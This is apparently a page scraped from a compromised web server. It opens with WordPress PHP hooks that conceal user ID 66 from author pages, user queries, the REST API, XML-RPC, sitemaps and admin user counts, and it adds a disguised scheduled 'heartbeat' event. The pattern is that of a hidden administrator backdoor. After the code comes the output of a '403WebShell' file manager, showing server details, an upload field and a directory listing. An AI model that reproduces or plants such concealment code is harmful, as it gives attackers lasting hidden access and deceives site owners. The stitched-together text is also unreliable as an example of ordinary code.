add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / usr /share /mime /audio / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
August 27 2024 14:25:08
root / root
0755
aac.xml
2.492 KB
August 27 2024 14:25:07
root / root
0644
ac3.xml
3.494 KB
August 27 2024 14:25:07
root / root
0644
amr-wb.xml
3.045 KB
August 27 2024 14:25:07
root / root
0644
amr.xml
2.867 KB
August 27 2024 14:25:07
root / root
0644
annodex.xml
2.09 KB
August 27 2024 14:25:08
root / root
0644
basic.xml
3.268 KB
August 27 2024 14:25:08
root / root
0644
flac.xml
2.979 KB
August 27 2024 14:25:07
root / root
0644
midi.xml
3.072 KB
August 27 2024 14:25:08
root / root
0644
mobile-xmf.xml
1.503 KB
August 27 2024 14:25:07
root / root
0644
mp2.xml
2.717 KB
August 27 2024 14:25:08
root / root
0644
mp4.xml
2.976 KB
August 27 2024 14:25:08
root / root
0644
mpeg.xml
3.022 KB
August 27 2024 14:25:08
root / root
0644
ogg.xml
2.071 KB
August 27 2024 14:25:08
root / root
0644
prs.sid.xml
3.344 KB
August 27 2024 14:25:07
root / root
0644
usac.xml
2.201 KB
August 27 2024 14:25:07
root / root
0644
vnd.audible.aax.xml
1.995 KB
August 27 2024 14:25:08
root / root
0644
vnd.audible.aaxc.xml
1.997 KB
August 27 2024 14:25:07
root / root
0644
vnd.dts.hd.xml
1.623 KB
August 27 2024 14:25:08
root / root
0644
vnd.dts.xml
2.435 KB
August 27 2024 14:25:08
root / root
0644
vnd.rn-realaudio.xml
3.319 KB
August 27 2024 14:25:08
root / root
0644
vnd.wave.xml
2.928 KB
August 27 2024 14:25:07
root / root
0644
webm.xml
2.57 KB
August 27 2024 14:25:08
root / root
0644
x-adpcm.xml
2.889 KB
August 27 2024 14:25:08
root / root
0644
x-aifc.xml
3.158 KB
August 27 2024 14:25:07
root / root
0644
x-aiff.xml
3.683 KB
August 27 2024 14:25:07
root / root
0644
x-amzxml.xml
3.282 KB
August 27 2024 14:25:07
root / root
0644
x-ape.xml
2.874 KB
August 27 2024 14:25:07
root / root
0644
x-dff.xml
1.58 KB
August 27 2024 14:25:08
root / root
0644
x-dsf.xml
1.6 KB
August 27 2024 14:25:07
root / root
0644
x-flac+ogg.xml
3.057 KB
August 27 2024 14:25:08
root / root
0644
x-gsm.xml
3.02 KB
August 27 2024 14:25:08
root / root
0644
x-iriver-pla.xml
2.603 KB
August 27 2024 14:25:07
root / root
0644
x-it.xml
3.462 KB
August 27 2024 14:25:07
root / root
0644
x-m4b.xml
3.29 KB
August 27 2024 14:25:08
root / root
0644
x-m4r.xml
2.123 KB
August 27 2024 14:25:08
root / root
0644
x-matroska.xml
3.076 KB
August 27 2024 14:25:07
root / root
0644
x-minipsf.xml
3.113 KB
August 27 2024 14:25:07
root / root
0644
x-mo3.xml
0.856 KB
August 27 2024 14:25:08
root / root
0644
x-mod.xml
3.762 KB
August 27 2024 14:25:08
root / root
0644
x-mpegurl.xml
1.98 KB
August 27 2024 14:25:08
root / root
0644
x-ms-asx.xml
3.958 KB
August 27 2024 14:25:08
root / root
0644
x-ms-wma.xml
3.299 KB
August 27 2024 14:25:07
root / root
0644
x-musepack.xml
2.973 KB
August 27 2024 14:25:07
root / root
0644
x-opus+ogg.xml
2.359 KB
August 27 2024 14:25:07
root / root
0644
x-pn-audibleaudio.xml
2.297 KB
August 27 2024 14:25:07
root / root
0644
x-psf.xml
2.79 KB
August 27 2024 14:25:07
root / root
0644
x-psflib.xml
3.528 KB
August 27 2024 14:25:08
root / root
0644
x-riff.xml
2.863 KB
August 27 2024 14:25:07
root / root
0644
x-s3m.xml
3.513 KB
August 27 2024 14:25:08
root / root
0644
x-scpls.xml
3.906 KB
August 27 2024 14:25:07
root / root
0644
x-speex+ogg.xml
3.108 KB
August 27 2024 14:25:08
root / root
0644
x-speex.xml
2.768 KB
August 27 2024 14:25:07
root / root
0644
x-stm.xml
3.406 KB
August 27 2024 14:25:08
root / root
0644
x-tak.xml
0.867 KB
August 27 2024 14:25:08
root / root
0644
x-tta.xml
3.031 KB
August 27 2024 14:25:07
root / root
0644
x-voc.xml
2.834 KB
August 27 2024 14:25:07
root / root
0644
x-vorbis+ogg.xml
3.407 KB
August 27 2024 14:25:07
root / root
0644
x-wavpack-correction.xml
3.821 KB
August 27 2024 14:25:07
root / root
0644
x-wavpack.xml
2.934 KB
August 27 2024 14:25:07
root / root
0644
x-xi.xml
0.843 KB
August 27 2024 14:25:08
root / root
0644
x-xm.xml
3.475 KB
August 27 2024 14:25:08
root / root
0644
x-xmf.xml
2.808 KB
August 27 2024 14:25:08
root / root
0644
Youez - 2016 - github.com/yon3zuLinuXploit